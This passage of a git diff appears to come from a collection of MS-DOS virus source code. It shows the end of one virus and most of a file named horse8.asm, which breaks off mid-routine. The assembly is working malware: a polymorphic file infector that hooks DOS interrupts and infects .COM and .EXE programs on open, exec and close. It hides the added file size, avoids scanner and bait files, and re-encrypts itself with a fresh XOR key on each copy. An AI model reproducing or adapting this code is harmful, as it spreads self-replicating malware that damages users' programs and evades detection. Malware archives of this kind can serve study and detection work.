dx,int13h-begin + push cs + pop ds + call exec + mov al,21 + lds dx,cs:[org_21h-begin] + call exec + mov al,24 + push cs + pop ds + mov dx,int24h-begin + int 21 + mov al,8 + mov dx,int08h-begin + int 21 + mov bx,bp + push bx + mov ax,1220 + call exec2f + mov bl,es:[di] + mov ax,1216 + call exec2f + pop bx + add di,11 + mov byte ptr es:[di-15d],2 + mov ax,es:[di] + mov dx,es:[di+2] + cmp dx,0 + jne contss + cmp ax,virlen + jnb contss + jmp close +contss: + cmp byte ptr cs:[function-begin],3dh + jne hhh + push di + add di,0f + mov si,offset fname-begin + cld + mov cx,8+3 + rep cmpsb + pop di + jne hhh + jmp close +hhh: + cmp es:[di+18],'MO' + jne a2 + jmp com +a2: + cmp es:[di+18],'EX' + je a8 + jmp close +a8: + cmp byte ptr es:[di+17],'E' + je a3 + jmp close +a3: + call cont + cmp word ptr [si],'ZM' + je okk + cmp word ptr [si],'MZ' + je okk + jmp close + okk: + cmp word ptr [si+0c],0 + jne uuu + jmp close +uuu: + mov cx,[si+16] + add cx,[si+8] + mov ax,10 + mul cx + add ax,[si+14] + adc dx,0 + mov cx,es:[di+2] + sub cx,dx + or cx,cx + jnz usm + mov cx,es:[di] + sub cx,ax + cmp cx,virlen-(start-begin) + jne usm + jmp close +usm: + mov byte ptr [ident-begin],'E' + mov ax,[si+0e] + mov [SS_save-begin],ax + mov ax,[si+14] + mov [IP_save-begin],ax + mov ax,[si+16] + mov [CS_save-begin],ax + mov ax,es:[di] + mov dx,es:[di+2] + add ax,virlen + adc dx,0 + mov cx,200 + div cx + mov [si+2],dx + or dx,dx + jz oj + inc ax +oj: + mov [si+4],ax + mov ax,es:[di] + mov dx,es:[di+2] + + mov cx,4 ; This could be so: + mov bp,ax ; + and bp,0fh ; mov cx,10 +lpp: ; div cx + shr dx,1 ; + rcr ax,1 ; + loop lpp ; + mov dx,bp ; + + sub ax,[si+8] + add dx,start-begin + adc ax,0 + mov [si+14],dx + mov [si+16],ax + mov word ptr [far_push-begin],ax + add ax,200 + mov [si+0eh],ax + write: + sub cx,cx + mov es:[di+4],cx + mov es:[di+6],cx + push es:[di-2] + push es:[di-4] + xchg cx,es:[di-0dh] + push cx + mov ah,40 + mov dx,buffer-begin + mov cx,01bh + int 21 + cmp byte ptr cs:[flag-begin],0ff + jne ghj + stc + jc exit +ghj: + mov ax,es:[di] + mov es:[di+4],ax + mov ax,es:[di+2] + mov es:[di+6],ax + call com? + jne f2 + sub es:[di+4],virlen + sbb es:[di+6],0 +f2: + mov ah,40 + sub dx,dx + mov cx,virlen + int 21 + cmp byte ptr cs:[flag-begin],0ff + jne exit + stc + exit: + pop cx + mov es:[di-0dh],cx + pop cx + pop dx + or byte ptr es:[di-0bh],40 + jc closed + call com? + jne f3 + and cx,31d + or cx,2 + jmp closed +f3: + or cx,31d +closed: + mov ax,5701 + int 21 +close: + mov ah,3e + int 21 + or byte ptr es:[di-0ch],40 + + push es + pop ds + mov si,di + add si,0f + mov di,offset fname-begin + push cs + pop es + mov cx,8+3 + cld + rep movsb + push cs + pop ds + + cmp byte ptr cs:[flag-begin],0ff + jne qw + mov ah,0dh + int 21 +qw: + cmp byte ptr cs:[veri-begin],1 + jne rtyyu + mov ax,2e01 + call exec +rtyyu: + sub ax,ax + mov ds,ax + cli + pop [13*4+2] + pop [13*4] + pop [24*4+2] + pop [24*4] + pop [21*4+2] + pop [21*4] + pop [8*4+2] + pop [8*4] + sti + retn + com: + test byte ptr es:[di-0dh],4 + jz esc4 + jmp close +esc4: + call cont + cmp byte ptr [si],0e9 + jne usm2 + mov ax,es:[di] + sub ax,[si+1] + cmp ax,virlen-(start-begin-3) + jne usm2 + jmp close +usm2: + push si + cmp byte ptr es:[di+17],'C' + jne esc + mov byte ptr [ident-begin],'C' + lodsw + mov cs:[IP_save-begin],ax + lodsw + mov cs:[CS_save-begin],ax + mov ax,es:[di] + cmp ax,65535d-virlen-1 + pop si + jb esc + jmp close +esc: + add ax,start-begin-3 + call com? + jne f1 + sub ax,virlen +f1: + mov byte ptr [si],0e9 + mov word ptr [si+1],ax + jmp write +inss: + + sub ax,ax + mov ds,ax + + pushf + pop ax + and ax,0feff + push ax + popf + + pushf + + mov [1*4],offset trap-begin + mov [1*4+2],cs + + pushf + pop ax + or ax,100 + push ax + popf + + mov ax,0ffff + call dword ptr [21h*4] + + sub ax,ax + mov ds,ax + + pushf + pop ax + and ax,0feff + push ax + popf + + pushf + + mov [1*4],offset trap2-begin + mov [1*4+2],cs + + pushf + pop ax + or ax,100 + push ax + popf + + mov ax,0ffff + call dword ptr [2fh*4] + + sub ax,ax + mov ds,ax + + pushf + pop ax + and ax,0feff + push ax + popf + + pushf + + mov [1*4],offset trap3-begin + mov [1*4+2],cs + + pushf + pop ax + or ax,100 + push ax + popf + + sub ax,ax + call dword ptr [13h*4] + + sub ax,ax + mov ds,ax + + les ax,[21*4] + mov word ptr cs:[current_21h-begin],ax + mov word ptr cs:[current_21h-begin+2],es + mov [21*4],offset inff-begin + mov [21*4+2],cs + retf + +trap: + push bp + mov bp,sp + push bx + cmp [bp+4],300 + ja exit2 + mov bx,[bp+2] + mov word ptr cs:[org_21h-begin],bx + mov bx,[bp+4] + mov word ptr cs:[org_21h-begin+2],bx + and [bp+6],0feff +exit2: + pop bx + pop bp + iret + +trap2: + push bp + mov bp,sp + push bx + cmp [bp+4],100 + ja exit3 + mov bx,[bp+2] + mov word ptr cs:[org_2fh-begin],bx + mov bx,[bp+4] + mov word ptr cs:[org_2fh-begin+2],bx + and [bp+6],0feff +exit3: + pop bx + pop bp + iret + + +trap3: + push bp + mov bp,sp + push bx + cmp [bp+4],0C800 + jb exit4 + mov bx,[bp+2] + mov word ptr cs:[org_13h-begin],bx + mov bx,[bp+4] + mov word ptr cs:[org_13h-begin+2],bx + and [bp+6],0feff +exit4: + pop bx + pop bp + iret + +exec: + pushf + call dword ptr cs:[org_21h-begin] + ret + + +exec2f: + pushf + call dword ptr cs:[org_2fh-begin] + ret +int08h: + pushf + call dword ptr cs:[current_08h-begin] + push ax + push ds + sub ax,ax + mov ds,ax + cli + mov [13*4],offset int13h-begin + mov [13*4+2],cs + mov [8*4],offset int08h-begin + mov [8*4+2],cs + mov ax,word ptr cs:[org_21h-begin] + mov [21*4],ax + mov ax,word ptr cs:[org_21h-begin+2] + mov [21*4+2],ax + mov [24*4],offset int24h-begin + mov [24*4+2],cs + sti + pop ds + pop ax + iret +int24h: + mov al,3 + iret +int13h: + pushf + call dword ptr cs:[org_13h-begin] + jnc dfg + mov byte ptr cs:[flag-begin],0ff +dfg: + clc + db 0ca,02,0 ;retf 2 + +cont: + sub ax,ax + mov es:[di+4],ax + mov es:[di+6],ax + mov ah,3f + mov cx,01bh + mov dx,offset buffer-begin + mov si,dx + int 21 + cmp byte ptr cs:[flag-begin],0ff + jne a1 + stc + pop ax + jmp close +a1: + ret +com?: + cmp es:[di+0f],'OC' + jne zz + cmp es:[di+11],'MM' + jne zz + cmp es:[di+13],'NA' + jne zz + cmp es:[di+15],' D' + jne zz + cmp es:[di+17],'OC' + jne zz + cmp byte ptr es:[di+19],'M' +zz: + ret +transfer: + + cld + inc dx + mov si,dx + mov di,offset buffer-begin + push di + push cs + pop es + mov cx,8 + rep movsb + mov al,'.' + stosb + mov cx,3 + rep movsb + mov al,0 + stosb + pop dx + push cs + pop ds + mov ax,3d00 + ret +e1: + cli + push ax + push di + push es + mov ax,0b800 + mov es,ax + mov ax,word ptr cs:[pos-begin] + push ax + call comp + mov ax,word ptr cs:[strg-begin] + stosw + pop ax + + or ah,ah + jz s3 + + cmp ah,24d + jb s1 +s3: + neg byte ptr cs:[y-begin] +s1: + or al,al + jz s4 + + cmp al,79d + jb s2 +s4: + neg byte ptr cs:[x-begin] +s2: + mov ah,byte ptr cs:[y-begin] + mov al,byte ptr cs:[x-begin] + add byte ptr cs:[pos+1-begin],ah + add byte ptr cs:[pos-begin],al + mov ax,word ptr cs:[pos-begin] + call comp + mov ax,es:[di] + mov word ptr cs:[strg-begin],ax + mov es:[di],0f07 + pop es + pop di + pop ax + sti + iret +comp: + push ax + push bx + sub bh,bh + mov bl,al + mov al,160d + mul ah + add ax,bx + add ax,bx + mov di,ax + pop bx + pop ax + ret +shop: + push ax + push ds + mov byte ptr cs:[x-begin],0ff + mov byte ptr cs:[y-begin],0ff + mov word ptr cs:[pos-begin],1013 + mov ax,0003 + int 10 + sub ax,ax + mov ds,ax + cli + mov [1c*4],offset e1-begin + mov [1c*4+2],cs + sti + pop ds + pop ax + ret +clearr: + sub ax,ax + sub bx,bx + sub cx,cx + sub dx,dx + sub si,si + sub di,di + sub bp,bp + ret + +db 666d ;Foolish ?!! -> dw 666d + +db 55,0AA + +endcode label word + + current_21h dd ? + current_08h dd ? + org_2fh dd ? + org_13h dd ? + org_21h dd ? + flag db ? + veri db ? + handle dw 0ffff + fname db 8+3 dup (?) + function db ? + pos dw ? + x db ? + y db ? + strg dw ? + counter dw ? + +buffer label word \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.horse8.asm b/MSDOS/Virus.MSDOS.Unknown.horse8.asm new file mode 100644 index 00000000..325b35fa --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.horse8.asm @@ -0,0 +1,1366 @@ + + .radix 16 + + sub bl,bl + mov cx,offset msg-calldos-2 + mov si,offset calldos + cld +lpp: + lodsb + xor bl,al + loop lpp + mov byte ptr [checksum],bl + + mov bp,offset adjust + call install1 + mov dx,offset Hellomsg + mov ah,9 + int 21 + int 20 + +Hellomsg db 0a,0dh,'OK friend...',0a,0dh,'$' + + Virus_lenght equ endcode-adjust + alllen equ buffer-adjust + + adjust label word + + new_addr dd 0 +last: + my_count dw 0 + + checksum db 0 + +;******************************************************************* +; * +; This is the program entry.... * +; * +;******************************************************************* + +Start_Virus: + +First_instr label word + +old label dword ; + + cli + push ax + + call nextline + +nextline: + +popreg label byte + + + db 01011000b ;pop reg + +pushreg label byte + + db 01010000b ;push reg +f_g: + + db 10000001b ;add reg,value + +addtoreg label byte + + db 11000000b ;reg + + dw offset codedstart-nextline ;value + +loadcount label byte + + db 10111000b ;mov reg,value + dw offset endcode-Start_Virus ;value + +where: + +decode: + + db 002e ;xor byte ptr cs:[reg+0],value + db 10000000b + +xorreg label byte + + db 70 + + db 00 + +xorvalue label byte + + db 00 + +incmain label byte + + db 01000000b ;inc reg + +deccount label byte + + db 01001000b ;dec reg + + jnz decode + +codedstart: + + pop bp + + jmp codedstart1 + +;************************************************** +; call next * +;next: * +; pop *reg* * +; push *reg* * +; add *reg*,codestart-nextline * +; mov *countreg*,endcode-codedstart * +;decode: * +; xor byte ptr cs:[*reg*+0],xorvalue * +; inc *reg* * +; dec *countreg* * +; jnz decode * +; * +; *reg*=index register,*countreg*=register * +;************************************************** + +calldos: + + pushf + call dword ptr cs:[old-adjust] + ret + + +give_him: + + push bp + mov bp,sp + push ax + push si ;you can't use this function illegally... + push ds + lds si,[bp+2] + lodsw + sub ax,0C008 + jz me + cli + hlt +me: + pop ds + pop si + pop ax + pop bp + + cmp byte ptr cs:[last-adjust],0FF ;Already got? + je gotten + cmp byte ptr cs:[f_g-adjust],0FF + jne gotten +all_ok: + mov es,word ptr cs:[where-adjust] + mov byte ptr cs:[last-adjust],0FF + iret + +go_out2: + jmp out + +gotten: + xchg ah,al + iret + +FF_old1: + call calldos + jmp FF_old + +FF_new1: + call calldos + jmp FF_new + + +res: + cmp ax,0FA01h + je give_him + + cmp ah,11 + je FF_old1 + cmp ah,12 + je FF_old1 + cmp ah,4e + je FF_new1 + cmp ah,4f + je FF_new1 + cmp ax,4b00 + jne go_out2 + cmp byte ptr cs:[f_g-adjust],0FF + je go_out2 + push ax + push bx + push cx + push dx + push si + push di + push ds + push es + + push ds + mov ah,62 + call calldos + mov ds,bx + cmp bx,[16] + pop ds + jne notthis + + call get + mov bx,word ptr cs:[last-adjust] + mov ds,bx + cmp [0001],bx + jb notthis + inc bx + push word ptr [0001] + mov es,bx + mov bx,[0003] + add bx,130 + mov ah,4ah + call calldos + pop word ptr [0001] + jnc allok +notthis: + jmp notnow +allok: + mov byte ptr cs:[f_g-adjust],0FF + lds si,cs:[new_addr-adjust] + add si,offset calldos-adjust + sub bl,bl + mov cx,offset msg-calldos-2 + cld +check: + lodsb + xor bl,al + loop check + cmp bl,byte ptr cs:[checksum-adjust] + jne notnow + mov ax,0FA01 + int 21 + or al,al + sub di,di + lds si,cs:[new_addr-adjust] + mov cx,Virus_lenght + push cx + push si + push ds + rep movsb + mov bx,es + pop es + pop di + pop cx + sub al,al + rep stosb + push cs + mov ax,offset notnow2-adjust + push ax + push bx + mov ax,offset Set_Vectors-adjust + push ax + retf + +notnow2: + pop es + pop ds + pop di + pop si + pop dx + pop cx + pop bx + pop ax + int 21 + db 0ca,2,0 ;retf 2 + +notnow: + pop es + pop ds + pop di + pop si + pop dx + pop cx + pop bx + pop ax + +out: + jmp dword ptr cs:[old-adjust] + +get: + push bx + push ds + push es + + mov ah,52h + call calldos + mov bx,es:[bx-02] +search: + mov ds,bx + inc bx + add bx,[0003] + mov es,bx + cmp byte ptr es:[0000],'Z' + jne search + + mov word ptr cs:[last-adjust],ds + mov word ptr cs:[where-adjust],bx + + pop es + pop ds + pop bx + ret + +FF_old: + push ax + push bx + push dx + push es + + or al,al + jnz Go_Out_ ;if error + + mov ah,2f ;get DTA address + call calldos + + cmp byte ptr es:[bx],0ff + jne standart + add bx,7 + +standart: + mov al,byte ptr es:[bx+30d-7] ;Seconds in al + and al,31d ;Mask seconds + cmp al,60d/2 ;Seconds=60? + jne Go_Out_ + and byte ptr es:[bx+30d-7],11100000b + mov ax,es:[bx+36d-7] + mov dx,es:[bx+38d-7] ;Check File size + sub ax,Virus_lenght + sbb dx,0 + jb Go_Out_ + + +Adjust_Size: + + mov es:[bx+28d+1],ax + mov es:[bx+28d+2+1],dx + +Go_Out_: + + pop es ;Return to caller + pop dx + pop bx + pop ax + iret + +FF_new: + pushf + push ax + push bx + push dx ;fuck again + push es + jc Go_Out_1 + + mov ah,2f + call calldos + + mov al,es:[bx+22d] + and al,31d + cmp al,60d/2 + jne Go_Out_1 + and byte ptr es:[bx+22d],11100000b + mov ax,es:[bx+26d] + mov dx,es:[bx+28d] + sub ax,Virus_lenght + sbb dx,0 + jb Go_Out_1 + +Adjust_Size1: + + mov es:[bx+26d],ax + mov es:[bx+28d],dx + +Go_Out_1: + + pop es + pop dx + pop bx + pop ax ; Dummy proc far + popf ; ret 2 + db 0ca,2,0 ;retf 2 ; Dummy endp => BUT too long... + +endinst label word + +codedstart1: + + sti + pop ax + +install: + + sub bp,offset nextline-adjust + +install1: + + cld ;Clear direction flag + push ax ;Save some registres + push es + push ds + + mov ax,0FA01 + int 21 + or al,al + jz do_dob + jmp install_ok +do_dob: + push es + pop ds + mov ax,[0002] + mov cx,1000 + sub ax,cx + mov es,ax + sub di,di + call SearchZero + jc Dont_copy + mov si,bp + mov cx,alllen + db 2e + rep movsb + +Dont_copy: + + sub ax,ax + mov ds,ax + mov ax,[21*4] + mov word ptr cs:[bp+old-adjust],ax + mov ax,[21*4+2] + mov word ptr cs:[bp+old-adjust+2],ax + mov ah,52 + int 21 + push es + mov es,es:[bx+14] + push es:[2] + sub di,di + mov si,bp + mov cx,endinst-adjust + db 2e + rep movsb + pop ax + pop ds + mov [bx+14],ax + mov ds,cx + mov [21*4],offset res-adjust + mov [21*4+2],es + jcxz Run_The_Program + +install_ok: + + cmp ax,01FAh + je Run_The_Program + mov word ptr cs:[bp+handle-adjust],0ffff ;set handle_save + mov si,bp + sub di,di + mov cx,alllen + db 2e + rep movsb + push cs + mov ax,Run_The_Program-adjust + add ax,bp + push ax + push es + mov ax,offset Set_Vectors-adjust ;Set vectors + push ax + retf + +SearchZero: + + sub ax,ax +Again: + inc di + push cx + push di + mov cx,alllen + repe scasb + pop di + jz FoundPlace + pop cx + loop Again + stc + ret + +FoundPlace: + + pop cx + mov word ptr cs:[bp+new_addr-adjust],di + mov word ptr cs:[bp+new_addr-adjust+2],es + clc + ret + +Run_The_Program: + + add bp,offset First_18-adjust + pop ds ;Restore saved ds,es,ax + pop es ;ds=es=PSP + pop ax + mov ax,'ZM' + cmp cs:[bp],ax ;Run the infected program + je run_exe + xchg ah,al + cmp cs:[bp],ax + je run_exe + jne Run_COM_File +run_exe: + mov cx,ds ;Calculate load segment + add cx,0010 + mov bx,cx + add cx,cs:[bp+16] ;Calculate CS value + add bx,cs:[bp+0e] ;Calculate SS value + mov ss,bx ;Run .EXE program + mov sp,word ptr cs:[bp+10] + push cx + push word ptr cs:[bp+14] + retf + +Run_COM_File: + + mov di,0100 + push di + mov si,bp + movsb ;Restore the first 3 bytes + movsw ;Run .COM program + ret + + db ' !' + +INT_21h_Entry_Point: + + cmp ah,3ch ;Create (3.X) + je create + cmp ah,5bh + je create + + cmp ah,6ch + jne not_create ;Create (4.X) + test bl,1 + jz not_create + jnz create + +not_create: + + call pusha + + mov byte ptr cs:[function-adjust],ah + + cmp ah,6ch ;Open (4.X) + je create_ + + cmp ah,3dh + je Function_4Bh + + cmp ah,3e ;Close + je close_ + + cmp ax,4b00 ;Exec + je Function_4Bh + +Return_Control: + + call popa + +Go_out: + jmp dword ptr cs:[current_21h-adjust] ;go to the old int 21 + +create_: + + or bl,bl ;Create file? + jnz Return_Control + mov dx,si + +Function_4Bh: + + mov ax,3d00h + call Infect_It + jmp Return_Control + +create: + cmp word ptr cs:[handle-adjust],0ffff + jne Go_out + call Call_Original_INT_21h + mov word ptr cs:[handle-adjust],ax + jnc Error + mov word ptr cs:[handle-adjust],0ffff +Error: +; retf 2 + db 0ca,2,0 + +close_: + cmp word ptr cs:[handle-adjust],0ffff + je Return_Control + cmp bx,word ptr cs:[handle-adjust] + jne Return_Control + mov ah,45 + call Infect_It + mov word ptr cs:[handle-adjust],0ffff + jmp Return_Control + + ;****************************************** + ; * + ; This infects the programs... * + ; * + ;****************************************** + +Infect_It: + + call Call_Original_INT_21h ;this is the infecting part + jnc No_error + ret + +No_error: + + xchg ax,bp + + mov ax,0200 + push ax + popf + + mov byte ptr cs:[flag-adjust],0 + + mov ah,54 + call Call_Original_INT_21h + mov byte ptr cs:[veri-adjust],al + cmp al,1 ;Switch off verify... + jne Go_On_Setting + mov ax,2e00 + call Call_Original_INT_21h + +Go_On_Setting: + + + mov ax,3513 + call Call_Original_INT_21h + push bx + push es + + mov word ptr cs:[current_13h-adjust],bx + mov word ptr cs:[current_13h-adjust+2],es + + mov ah,25 + mov dx,INT_13h_entry-adjust ;Set int 13h + push cs + pop ds + call Call_Original_INT_21h + + mov ax,3524 + call Call_Original_INT_21h + push bx + push es + + mov ah,25 + mov dx,INT_24h_entry-adjust ;Set int 24h (Useless maybe...). + call Call_Original_INT_21h + + push cs + push cs + pop ds + pop es + mov dx,offset DOS_13h-adjust + mov bx,dx ;Set New DOS int 13h + mov ah,13 + call Call_Original_INT_2Fh + + push bx + push es + push dx + push ds + + push cs + pop ds + + xchg bx,bp + push bx + mov ax,1220 + call Call_Original_INT_2Fh + mov bl,es:[di] ;Remember the good old V512 ? + mov ax,1216 + call Call_Original_INT_2Fh + pop bx + add di,11 + + mov byte ptr es:[di-15d],2 + mov ax,es:[di] + mov dx,es:[di+2] + cmp ax,3000d + sbb dx,0 + jb Not_good +Go_on: + cmp byte ptr cs:[function-adjust],3dh + je Scan_name + cmp byte ptr cs:[function-adjust],6ch + jne Dont_Scan_Name + +Scan_name: + + push di + add di,0f + mov si,offset fname-adjust ;wasn't that the last opened file? + cld + mov cx,8+3 + rep cmpsb + pop di + je Not_good + +Dont_Scan_Name: + + cmp es:[di+18],'MO' + jne Check_For_EXE ;check for .COM file + cmp byte ptr es:[di+17],'C' + jne Check_For_EXE + jmp com + +Check_For_EXE: + + cmp es:[di+18],'EX' + jne Not_good ;check for .EXE file + cmp byte ptr es:[di+17],'E' + je Check_For_Valid_EXE + +Not_good: + + jmp close + +Check_For_Valid_EXE: + + call Read_First_18 + cmp word ptr [si],'ZM' + je Valid_EXE ;check for valid .EXE file + cmp word ptr [si],'MZ' + jne Not_good + + Valid_EXE: + + cmp byte ptr es:[di+0f],'M' ;MAPMEM + je Not_good + cmp es:[di+0f],'RT' ;TRAPFILE + je Not_good + cmp es:[di+0f],'CS' ;SCAN.EXE + jne go_on_a + cmp es:[di+11],'NA' + je Not_good +go_on_a: + cmp es:[di+0f],'NA' ;ANTI****.*EXE + jne go_on_b + cmp es:[di+11],'IT' + je Not_good +go_on_b: + cmp es:[di+0f],'LC' ;CLEANNEW.EXE + jne low_mem? + cmp es:[di+11],'AE' + je Not_good + +Low_mem?: + cmp word ptr [si+0c],0ffff ;only low-mem .EXE + jne Not_good + +Low_Mem: + + mov cx,[si+16] + add cx,[si+8] ;Something common with EDDIE.. + mov ax,10 + mul cx + add ax,[si+14] + adc dx,0 + mov cx,es:[di] + sub cx,ax + xchg ax,cx + mov cx,es:[di+2] + sbb cx,dx + or cx,cx + jnz Not_Infected_EXE ;infected? + cmp ax,(endcode-Start_Virus) + jbe Not_good + +Not_Infected_EXE: + + mov ax,es:[di] + mov dx,es:[di+2] + + add ax,Virus_lenght + adc dx,0 + mov cx,200 ;(C) by Lubo & Jan... + div cx + mov [si+2],dx + or dx,dx + jz OK_MOD + inc ax + +OK_MOD: + mov [si+4],ax + mov ax,es:[di] + mov dx,es:[di+2] + + mov cx,10 + div cx + + sub ax,[si+8] + add dx,Start_Virus-adjust + adc ax,0 + mov [si+14],dx + mov [si+16],ax + add ax,(Virus_lenght)/16d+1 + mov [si+0eh],ax + mov [si+10],100 + write: + mov ax,5700 + call Call_Original_INT_21h + push cx + push dx + + sub cx,cx + mov es:[di+4],cx + mov es:[di+6],cx + mov cl,20 + xchg cl,byte ptr es:[di-0dh] + push cx + mov ah,40 ;this writes the first few bytes and glues the virus + mov dx,buffer-adjust + mov cx,18 + + call Call_Original_INT_21h + + call make_mutation + + push es + push di + push cs + pop es + mov di,si + sub si,si + mov cx,Virus_lenght + push di + rep movsb + pop di + add di,offset codedstart-adjust + mov al,byte ptr [xorvalue-adjust] + mov cx,offset endcode-codedstart + +codeit: + xor byte ptr [di],al + inc di + loop codeit + + pop di + pop es + + inc word ptr [my_count-adjust] + + mov ax,es:[di] + mov es:[di+4],ax + mov ax,es:[di+2] + mov es:[di+6],ax + call Check_For_COMMAND ;(C) + jne Dont_Adjust_Size + sub es:[di+4],Virus_lenght + +Dont_Adjust_Size: + + mov ah,40 + mov dx,offset buffer-adjust + mov cx,Virus_lenght + call Call_Original_INT_21h + + pop cx + mov byte ptr es:[di-0dh],cl + pop dx + pop cx + + cmp byte ptr cs:[flag-adjust],0ff + je Set_Time_and_Date +exit: + call Check_For_COMMAND + je Set_Time_and_Date + and cl,11100000b + or cl,60d/2 + +Set_Time_and_Date: + + mov ax,5701 + call Call_Original_INT_21h +close: + + mov ah,3e + call Call_Original_INT_21h + mov si,di + add si,0f + mov di,fname-adjust + push es + pop ds + push cs + pop es + mov cx,8+3 ;save the fname to a quit place + rep movsb + push cs + pop ds + + cmp byte ptr cs:[flag-adjust],0ff + jne Dont_Clear_Buffers + mov ah,0dh ;if error occured-clear disk buffers + + call Call_Original_INT_21h + +Dont_Clear_Buffers: + + cmp byte ptr cs:[veri-adjust],1 + jne Restore_Vectors + mov ax,2e01 + + call Call_Original_INT_21h + +Restore_Vectors: + + + pop ds + pop dx + pop es + pop bx + + mov ah,13 + call Call_Original_INT_2Fh + + sub ax,ax + mov ds,ax + pop [24*4+2] + pop [24*4] + pop [13*4+2] + pop [13*4] ;restore vectors and return + ret + + com: + test byte ptr es:[di-0dh],4 ;if it is a system file + jnz Not_OK_COM_File ;I had some problems here with + ;V1160 & V1776 (with the ball) + cmp es:[di],65535d-Virus_lenght*2-100 + ja Not_OK_COM_File + + cmp es:[di+0f],'RT' ;TRAPFILE + je Not_OK_COM_File + cmp byte ptr es:[di+0f],'M' ;MV.COM + je Not_OK_COM_File + + call Read_First_18 + mov ax,[si+10] ;CHECK IF THAT'S A TRAP FILE + cmp ax,[si+12] + je Not_OK_COM_File + cmp byte ptr [si],0E9 + jne OK_COM_file + mov ax,es:[di] + sub ax,[si+1] ;infected? + cmp ax,(endcode-Start_Virus+3) + jbe Not_OK_COM_File + +OK_COM_file: + + mov ax,es:[di] + add ax,Start_Virus-adjust-3 + call Check_For_COMMAND + jne Normally + sub ax,Virus_lenght + +Normally: + + mov byte ptr [si],0E9 + mov word ptr [si+1],ax + jmp write + +Not_OK_COM_File: + + jmp close + +Set_Vectors: + + sub ax,ax + mov ds,ax + + push [1*4] + push [1*4+2] ; <= (C) by N.Hacker. + + pushf + pushf + pushf + pushf + + mov byte ptr cs:[flag-adjust],ah + mov byte ptr cs:[my_flag-adjust],ah + mov word ptr cs:[limit-adjust],300 + mov word ptr cs:[mem_-adjust],org_21h-adjust + + mov [1*4],offset trap-adjust + mov [1*4+2],cs + + call set_trace + + mov ax,3521 + + call dword ptr [21h*4] + + mov word ptr cs:[current_21h-adjust],bx ;get old int 21 + mov word ptr cs:[current_21h-adjust+2],es + + mov byte ptr cs:[flag-adjust],0 + mov word ptr cs:[mem_-adjust],org_2fh-adjust + + call set_trace + + mov ax,1200 + + call dword ptr [2fh*4] ;do trace int 2f + + + mov byte ptr cs:[flag-adjust],0 + mov byte ptr cs:[my_flag-adjust],0FF + mov word ptr cs:[limit-adjust],0C800 + mov word ptr cs:[mem_-adjust],org_13h-adjust + + call set_trace + + sub ah,ah + + call dword ptr [13h*4] ;do trace int 13 + + mov byte ptr cs:[flag-adjust],0 + mov word ptr cs:[limit-adjust],0F000 + mov word ptr cs:[mem_-adjust],Floppy_org_13h-adjust + + call set_trace + + sub ah,ah + + call dword ptr [13h*4] + + pop [1*4+2] + pop [1*4] + + mov [21*4],offset INT_21h_Entry_Point-adjust ;set it + mov [21*4+2],cs + + retf + +set_trace: + + pushf + pop ax + or ax,100 + push ax + popf + ret + +trap: + push bp + mov bp,sp + push bx + push di + cmp byte ptr cs:[flag-adjust],0ff + je off + mov di,word ptr cs:[mem_-adjust] + mov bx,word ptr cs:[limit-adjust] + cmp [bp+4],bx + pushf + cmp byte ptr cs:[my_flag-adjust],0ff + jne It_Is_JA + + popf + jb Go_out_of_trap + jmp It_Is_JB + +It_Is_JA: + + popf + ja Go_out_of_trap + +It_Is_JB: + + mov bx,[bp+2] + mov word ptr cs:[di],bx + mov bx,[bp+4] + mov word ptr cs:[di+2],bx + mov byte ptr cs:[flag-adjust],0ff +off: + and [bp+6],0feff + +Go_out_of_trap: + + pop di + pop bx + pop bp + iret + + +Call_Original_INT_21h: + + pushf + call dword ptr cs:[org_21h-adjust] + ret + + + +Call_Original_INT_2Fh: + + pushf + call dword ptr cs:[org_2fh-adjust] + ret + +INT_24h_entry: + + mov al,3 + iret + +;************************** +; (C) by N.Hacker. * +; (bellow) * +;************************** + +INT_13h_entry: + + mov byte ptr cs:[next_flag-adjust],0 + + cmp ah,2 + jne Other + + cmp byte ptr cs:[function-adjust],03Eh + jne Dont_hide + + dec byte ptr cs:[next_flag-adjust] + inc ah + jnz Dont_hide + +Other: + + cmp ah,3 + jne Dont_hide + + cmp byte ptr cs:[flag-adjust],0ff + je no_error_ + + cmp byte ptr cs:[function-adjust],03Eh + je Dont_hide + + inc byte ptr cs:[next_flag-adjust] + dec ah + +Dont_hide: + + pushf + call dword ptr cs:[current_13h-adjust] + jnc no_error_ + mov byte ptr cs:[flag-adjust],0ff + +no_error_: + + clc + db 0ca,02,0 ;retf 2 + + +DOS_13h: + + cmp byte ptr cs:[next_flag-adjust],0 + je OK + + cmp ah,2 + je Next + cmp ah,3 + jne OK +Next: + cmp byte ptr cs:[next_flag-adjust],1 + jne Read + inc ah + jne OK +Read: + + dec ah +OK: + test dl,80 + jz Floppy + jmp dword ptr cs:[org_13h-adjust] +Floppy: + jmp dword ptr cs:[Floppy_org_13h-adjust] + + +Read_First_18: + + sub ax,ax + mov es:[di+4],ax + mov es:[di+6],ax + mov ah,3f + mov cx,18 + mov dx,buffer-adjust + mov si,dx + call Call_Original_INT_21h + call pusha + push cs + pop es + mov di,offset First_18-adjust + mov cx,18 + rep movsb + call popa + ret + +Check_For_COMMAND: + + cmp es:[di+0f],'OC' + jne Not_COMMAND + cmp es:[di+11],'MM' + jne Not_COMMAND + cmp es:[di+13],'NA' + jne Not_COMMAND ;check for command.com + cmp es:[di+15],' D' + jne Not_COMMAND + cmp es:[di+17],'OC' + jne Not_COMMAND + cmp byte ptr es:[di+19],'M' + +Not_COMMAND: + + ret + +pusha: + pop word ptr cs:[ret_addr-adjust] + pushf + push ax + push bx + push cx + push dx + push si + push di + push bp + push ds + push es + jmp word ptr cs:[ret_addr-adjust] + +popa: + pop word ptr cs:[ret_addr-adjust] + pop es + pop ds + pop bp + pop di + pop si + pop dx + pop cx + pop bx + pop ax + popf + jmp word ptr cs:[ret_addr-adjust] + +make_mutation: + + sub ax,ax + mov ds,ax + mov ax,[046C] + or al,al + clc + jnz good_value + inc al + stc + +good_value: + + push cs + pop ds + + mov byte ptr [xorvalue-adjust],al + jnc well_ok + dec al + +well_ok: + + and al,0111b ;BX,SI,DI,BP + or al,0100b + + cmp al,0100b + jne okreg + inc al + +okreg: + + and byte ptr [popreg-adjust],11111000b + or byte ptr [popreg-adjust],al + + and byte ptr [addtoreg-adjust],11111000b + or byte ptr [addtoreg-adjust],al + + and byte ptr [incmain-adjust],11111000b + or byte ptr [incmain-adjust],al + + and byte ptr [pushreg-adjust],11111000b + or byte ptr [pushreg-adjust],al + + call adjustreg + + and byte ptr [xorreg-adjust],11111000b + or byte ptr [xorreg-adjust],al 